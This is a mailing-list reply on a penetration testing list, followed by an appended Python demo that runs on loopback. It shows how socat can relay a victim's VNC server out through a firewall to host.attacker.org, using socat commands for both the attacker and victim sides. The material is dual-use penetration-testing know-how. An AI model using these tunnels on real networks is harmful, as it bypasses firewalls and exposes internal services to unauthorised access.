Penetration Testing mailing list archives

Re: TCP/IP GenderChanger


From: Gerhard Rieger <gerhard.rieger () dest-unreach com>
Date: Wed, 31 Jul 2002 21:51:22 +0200 (CEST)

[sorry if double]

You might use socat from http://www.dest-unreach.org/socat/ as
"gender changer".

On your outside server host.attacker.org run it as double server:
socat tcp-l:80 tcp-l:5900
or, for multiple connections, with access restrictions, logging etc:
socat -d -d tcp-l:80,fork,range=host.victim.org/24,reuseaddr tcp-l:5900,range=localhost/32,reuseaddr

and on host.victim.org:
socat tcp:localhost:5900 tcp:host.attacker.org:80

This scenario was one of socat's design goals, after I had to realize that
netcat with its derivatives and the usual port forwarders could not
easily be used for things like these.

regards
Gerhard Rieger


Ivan Buetler wrote:

Hi there,

The following article will discuss bidirectional inside-out attacks,
inspired by netcat. The article discusses how to access a victim's VNC server
behind a firewall, where the victim initiates connections to the attacker.

http://www.csnc.ch/downloads/docs/techdocs/TCP-IP_GenderChanger_CSNC_V1.0.pdf
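
The rendezvous relay that Gerhard's two socat lines set up, reimplemented as an added example (not socat's code and not part of the original thread): the attacker-side "double server" accepts the victim's outbound connection on one port, then accepts a local viewer on a second port and splices the two; the victim side connects to its local service and to the attacker and splices those. The VNC server is a constructed stand-in on loopback that sends the RFB version banner and echoes one line back in upper case; all ports are ephemeral and the `range=` restriction is approximated with a CIDR check, so the script runs offline.

```python
import ipaddress
import socket
import threading


def _listen(port=0, host="127.0.0.1"):
    """Bind a listener; port 0 lets the OS pick a free port (reuseaddr like socat's)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((host, port))
    s.listen(5)
    return s


def _pipe(src, dst):
    """Copy bytes one way until EOF, then half-close the destination."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def splice(a, b):
    """Bidirectional relay between two connected sockets (what socat does once both addresses are open)."""
    for src, dst in ((a, b), (b, a)):
        threading.Thread(target=_pipe, args=(src, dst), daemon=True).start()


def in_range(addr, net):
    """Stand-in for socat's range= option: is the peer address inside the allowed network?"""
    return ipaddress.ip_address(addr) in ipaddress.ip_network(net)


def double_server(victim_port=0, viewer_port=0, allowed_victim_net="0.0.0.0/0"):
    """Attacker side, like `socat tcp-l:80,fork,range=... tcp-l:5900,range=localhost/32`.
    Accept the victim's outbound connection first, then the local viewer, and splice them.
    Returns the two bound port numbers."""
    victim_l = _listen(victim_port)
    viewer_l = _listen(viewer_port)  # assumption: loopback only, mirroring range=localhost/32

    def run():
        while True:  # loop instead of socat's fork: serve one victim connection after another
            victim, (peer_ip, _) = victim_l.accept()
            if not in_range(peer_ip, allowed_victim_net):
                victim.close()
                continue
            viewer, _ = viewer_l.accept()
            splice(victim, viewer)

    threading.Thread(target=run, daemon=True).start()
    return victim_l.getsockname()[1], viewer_l.getsockname()[1]


def victim_connector(service_addr, attacker_addr):
    """Victim side, like `socat tcp:localhost:5900 tcp:host.attacker.org:80`:
    connect to the local service, then out through the firewall, and splice."""
    svc = socket.create_connection(service_addr)
    out = socket.create_connection(attacker_addr)
    splice(svc, out)


def fake_vnc_server():
    """Constructed stand-in for a VNC server: send the RFB banner, echo one line upper-cased."""
    l = _listen(0)

    def run():
        conn, _ = l.accept()
        conn.sendall(b"RFB 003.008\n")
        conn.sendall(conn.recv(4096).upper())
        conn.close()

    threading.Thread(target=run, daemon=True).start()
    return l.getsockname()[1]


def demo():
    """Run the whole inside-out exchange on loopback; return (banner, reply) seen by the viewer."""
    vnc_port = fake_vnc_server()
    victim_port, viewer_port = double_server(allowed_victim_net="127.0.0.0/8")
    victim_connector(("127.0.0.1", vnc_port), ("127.0.0.1", victim_port))
    viewer = socket.create_connection(("127.0.0.1", viewer_port))
    viewer.settimeout(5)
    banner = viewer.recv(4096)
    viewer.sendall(b"hello from viewer\n")
    reply = viewer.recv(4096)
    viewer.close()
    return banner, reply


if __name__ == "__main__":
    print(demo())
```

The ordering matters in the same way as with socat: the attacker side must be listening before the victim connects out, and the viewer is only accepted once a victim connection has arrived, so a viewer connecting early simply waits in the backlog. The `range=` check is done after `accept()` here, as socat does; a second listener restricted to `localhost/32` is what keeps anyone else on the network from riding the victim's tunnel.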

